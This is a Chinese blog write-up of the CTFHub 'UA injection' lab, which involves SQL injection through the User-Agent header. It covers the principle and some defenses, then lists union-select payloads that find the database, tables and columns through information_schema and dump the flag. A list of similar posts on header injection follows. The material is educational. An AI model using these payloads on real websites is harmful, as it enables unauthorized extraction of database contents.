CTFHub - UA注入

最新推荐文章于 2024-04-08 21:27:32 发布
最新推荐文章于 2024-04-08 21:27:32 发布
阅读量385 收藏 2
点赞数 2
分类专栏: CTFHub 文章标签: 网络安全 web安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Have_a_great_day/article/details/132793857
版权

目录

1. UA注入原理

2. 防御

3. 注入过程

3.1 初始界面

3.2 判断使用手法及类型

3.3 获取数据库 库名称

3.4 获取数据表 表名称

3.5 获取列名

3.6 获取数据

1. UA注入原理

  1. UA注入是一种特定类型的SQL注入攻击,它利用了用户代理(User-Agent,简称UA)字符串中包含的恶意代码来攻击应用程序。UA字符串是浏览器或其他HTTP客户端发送给服务器的一部分信息,其中包括有关客户端操作系统、浏览器版本、设备类型等信息。
  2. UA注入攻击的原理与常规的SQL注入攻击类似,都是通过注入恶意的SQL语句来攻击应用程序的数据库。但是UA注入攻击的特点是,它不是利用表单字段或URL参数等用户可以直接操作的输入来注入SQL,而是利用UA字符串作为输入。攻击者可以通过修改UA字符串,将恶意的SQL代码插入到应用程序的数据库查询中。

2. 防御

  • 对于从UA字符串中提取的数据,始终进行充分的验证和过滤。
  • 确保服务器端的输入验证和过滤逻辑能够正确处理所有的HTTP请求头字段。
  • 使用参数化查询或预编译语句,而不是将用户提供的数据直接拼接到SQL查询中。
  • 最小化数据库用户的权限,确保数据库用户只能执行必要的操作。

3. 注入过程

3.1 初始界面

        SQL 注入点不止会出现在GET 参数或POST 参数中。其中UA注入则是一种特定的SQL注入形式,它利用了应用程序中使用的UA来进行攻击。

        此题为UA注入,所以我们利用bp进行抓包,找到数据包内的UA进行注入。

刷新一次后。 

3.2 判断使用手法及类型

        根据页面存在回显,可使用联合查询。

        根据页面没有报错信息,不可使用报错注入。

      【2 and 1=2】

        当前select语句中的列数。

-2 union select 1,2 

3.3 获取数据库 库名称

-2 union select 1,database()

3.4 获取数据表 表名称

        使用的命令为:select * from 表名 where 限制条件。

        table_schema=database() :选择当前连接的数据库(sqli)中的所有表。

        group_concat:多个行的值合并为一个字符串的聚合函数。通俗的将就是回显出所有内容。

        可以发现此处没有【flag】表,取而代之的是【gnihfyuxxz】,查看该表中的列名。

       【news】表一直都存在,所以第一想法先不考虑此表中的内容。

 -2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

3.5 获取列名

         table_name='gnihfyuxxz' :选择表名为【gnihfyuxxz】的表的数据。得到该表中的列名【hsvdxohjvr】。

-2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='gnihfyuxxz'

3.6 获取数据

 -2 union select 1,hsvdxohjvr from gnihfyuxxz

懒羊羊安全
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UPC-UA C#样例程序
06-06
UPC-UA,全称为Unified Architecture for OPC(统一架构OPC),是OPC基金会推出的一种全新的标准,用于在工业自动化和物联网(IoT)环境中实现设备和系统间的互操作性。C#是Microsoft开发的一种面向对象的编程语言,常...
opc-ua-client:OPC-UA客户端用户界面
05-14
OPC-UA客户端用户界面如何构建和运行需要什么: 最新稳定的 最新稳定的mvn clean installjava -jar opcua-ui/target/opc-ua-client-jar-with-dependencies.jarOPC-UA模拟服务器端点网址关联opc.tcp://opcua.demo-...
渗透测试---手把手教你SQL注入(3)---UA注入与referer注入
weixin_52796034的博客
10-10 492
有些网站会把用户的UA信息写入数据库,用来收集和统计用户信息,此时就有可能存在UA注入,一般会把数据插入到某张表中所以可以用报错注入。 当我们访问一个网站的时候,我们的浏览器需要告诉服务器我们是从哪个地方访问服务器的,大部分网站或者app都会将这样的信息写入数据库用来分析流量从哪里来,以及统计广告投入的成本,通常情况下,服务器会把数据插入到某张表中,那么我们就可以借此使用报错注入
CTFHub | UA注入
尼泊罗河伯的博客
11-23 1989
根据题目显示内容,此题和上一题一致,需要在 UA 请求头中进行 SQL 注入。使用 burp suite 抓包工具抓取题目网站的信息,直接在 UA 请求中使用 payload 进行测试,发现此题存在 UA 注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 klsedpegmy 数据中。
UA注入Cookie注入Referer注入
十五年游戏主程转渗透之路
04-09 5081
UA注入,Cookie注入,Referer注入
sql学习5(cookie注入UA注入,refer注入,过滤空格)
cyy001128的博客
04-08 1203
获取cookie可免密登录管理员账户Cookie通常被用来辨别用户身份,就是保存用户的账号和密码用来自动登录网站cookie注入的基本条件:使用了request方法,但是注入保护程序中只对get\post方法提交的数据进行了过滤。
CTFHub技能树之WEBUA注入
weixin_48799157的博客
03-20 2064
小白一个,如有错误请指正! UA就是User-Agent的缩写,中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。 个人感觉UA注入和Cookie注入是有点像的,都是从请求头中修改参数,payload和普通的union注入是一样的。 解法一: Burps...
sce-ua.rar_VIC 模型_python sce-ua_python sceua_sce-ua VIC_vic
07-15
在" VIC 模型_python sce-ua_python sceua_sce-ua VIC_vic "这个压缩包中,我们关注的是如何使用Python语言对VIC模型进行参数率定。 SCE-UA(Sequential Uncertainty Fitting Algorithm with Evolution Strategy)...
prosys-opc-ua-client
01-09
setup OPC UA communication among Delta AS PLC (AS-FOPC02), Prosys OPC software,
prosys-opc-ua-simulation-server-windows-x64-5.4.6-148.exe
06-01
On Windows, run the installer executable prosys-opc-ua-simulation-server-windows-x64-5.4.6-148.exe and follow the instructions. By default, the application is installed to the folder Program Files/...
MySQL结构、Cookie注入UA注入、Refer注入ctfhub
2401_82985722的博客
04-01 874
User-Agent是Http协议中的一部分,属于头域的组成部分,(简称UA)。是一种向访问网站提供你所使用的浏览器类型、
CTFHUB-UA注入
Web学习之路
03-28 159
user-agent
SQL注入12】User-Agent 注入基础及实践(基于BurpSuite工具和Sqli-labs-less18靶机平台)
Fighting_hawk的博客
02-21 4898
1. 了解user-agent注入点; 2. 掌握user-agent注入的方法。
ctfhub UA注入
plant1234的博客
06-18 580
UA注入: 首先更具题目知道这道题的题目的 传参点是在User-Agent 所以里bp抓包得到更改User-Agent为1得到: 在利用: 1’ 1’ and 1=1 # 1 and 1=1 1 and 1=2 去测试是否有注入得到: 得到这是有注入的,于是在利用语句: 1 order by 1 1 order by 2 1 order by 3 得到有两个字段 在利用语句: 520 union select 1,2 得出注入点: 这是1,2两个位置都能注入 于是报出库名: 520 u
CTFHubUA注入和Refer注入
sGanYu
07-27 2830
UA注入 UA是什么?UA也称User-Agent,当用户发起一个请求时,网站会通过判断 UA的数据,如(名称,版本,浏览器内核,内核版本)等等,来给不同的操作系统,不同的浏览器发送不同的页面 一般来说,普通的 SQL 注入是对 URL 及参数进行的,但这里攻击者却将 SQL 查询语句隐藏在了 HTTP 头部的User-Agent字段之中 ,也称UA注入 查询中用到的参数: column_name:列的名称 Information_schema.columns:表示所有的列的信息 Informa
SQL注入-HTTP头部注入
LJH1999ZN的博客
02-11 2819
一、http头部注入-User-Agent 1.user-agent 是什么 用户代理(User Agent,简称 UA),是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。 2.http头部(user-agent)注入原理 由于后端对user-agent的数据保存到数据中,此时我们可以就可以利用SQL注入。 3.http头部(user-agent)注入的实现 3.1.打开sqlilabs/Less-18/i
CTFHUB-技能树-Web题-SQL注入-Mysql结构-UA注入
最新发布
Static______的博客
04-08 633
虽然有提示,在此还是按常规进行一下注入点判断吧。利用bp抓包,发送至repeater进行判断。1,2都回显,由此判断可回显字段数为2。得到两个表名,尝试查看第一个表中的数据。UA注入,即User-Agent注入UA注入 需要用到leve 3。注入点在User-Agent。得到列名xwprqxhxjd。由此判断,表中有两个字段。由此判断,此处为注入点。得到数据库名为sqli。
CTFHUBwebSQL注入UA
weixin_49539962的博客
08-06 109
接下来就是找数据库名、表名、列名、flag字段了。题目提示是UA注入,那就抓包并对UA头进行处理。猜测应该有两个回显。
CTFHub技能树web(持续更新)--SQL注入--UA注入
jiuyongpinyin的博客
09-05 467
UA注入 首先根据题目的提示,告诉我们输入点在User-Agent,所以我们抓包进行尝试: 我们发现了返回值不光有user-agent的数据,前面还有查询语句,那么我们输入一个1试一下: 到了这里是不是有点熟悉了,和上一篇cookie注入一样了,那么我就不废话,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库的表名: 得到了奇怪的表名,查看这个里面的列: 得到列,查询里面的字段: 得到flag 注:萌新
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值